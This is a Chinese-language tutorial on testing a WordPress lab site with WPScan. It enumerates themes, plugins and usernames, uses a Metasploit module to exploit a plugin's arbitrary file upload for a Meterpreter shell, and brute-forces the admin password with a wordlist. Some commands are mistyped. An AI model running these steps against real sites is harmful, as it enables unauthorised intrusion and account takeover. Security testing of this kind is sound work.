WPScan使用完整攻略:如何對WordPress站點進行安全測試。本文將告訴大家如何使用WPScan來對WordPress站點進行安全測試。
WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它采用Ruby編寫,能夠掃描WordPress網站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的數據庫中包含超過18000種插件漏洞和2600種主題漏洞,并且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測當前已啟用的插件和其他功能。
接下來,讓我們進入正題…
工具安裝與運行
Kali Linux默認自帶了WPScan,你也可以使用下列命令在自己的設備中安裝WPScan:
git clone https://github.com/wpscanteam/wpscan.git
切換到WPScan目錄中,運行下列命令查看幫助信息:
./wpscan.rb–h
你也可以使用以下命令更新漏洞庫:
wpscan -update
掃描WordPress站點
我們可以使用–enumerate選項來掃描并發現關于目標站點主題、插件和用戶名信息。輸入下列命令開始對服務器進行掃描:
./wpscan.rb –u http://192.168.0.101/wordpress/
如果你不知道目標服務器的IP地址,你可以直接輸入URL地址。下面給出的是掃描結果:
從結果中可以看到,服務器信息為Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。我們還發現,上傳目錄開啟了目錄監聽功能,因此任何人都可以通過訪問wp-content/uploads來查看目錄中的上傳內容。
主題掃描
使用下列命令對主題進行掃描:
./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t
使用下列命令掃描主題中存在的漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt
插件掃描
插件可以擴展WordPress站點的功能,但很多插件中都存在安全漏洞,而這也會給攻擊者提供可乘之機。
我們可以使用下列命令掃描WordPress站點中安裝的插件:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p
我們可以看到該網站中安裝了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及很多其他的插件。
接下來,我們可以使用下列命令來掃描目標插件中的安全漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp
我們可以從掃描結果中看到這三款插件中存在的漏洞以及利用路徑:
結合Metasploit利用插件中的漏洞
接下來,我們將用第一個插件中的任意文件上傳漏洞來進行漏洞利用演示,該漏洞允許我們上傳惡意文件并實現遠程代碼執行。
打開終端窗口并輸入下列命令:
useexploit/unix/webapp/wp_reflexgallery_file_upload
msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msfexploit(wp_reflexgallery_file_upload) > exploit
你將看到終端與目標設備建立了Meterpreter會話,你可以輸入下列命令查看目標系統信息:
Sysinfo
枚舉WordPress用戶名
我們可以在終端中輸入下列命令來枚舉WordPress用戶名:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u
接下來工具將導出用戶名數據表,你可以看到用戶名以及對應的ID信息。
當然了,你也可以使用下列命令枚舉出所有的內容:
./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u
–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targeted website
使用WPScan進行暴力破解
在進行暴力破解攻擊之前,我們需要創建對應的字典文件。輸入下列命令:
./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin
如果找到了相匹配的用戶名與密碼,工具將直接以admin:password的形式顯示出來:

|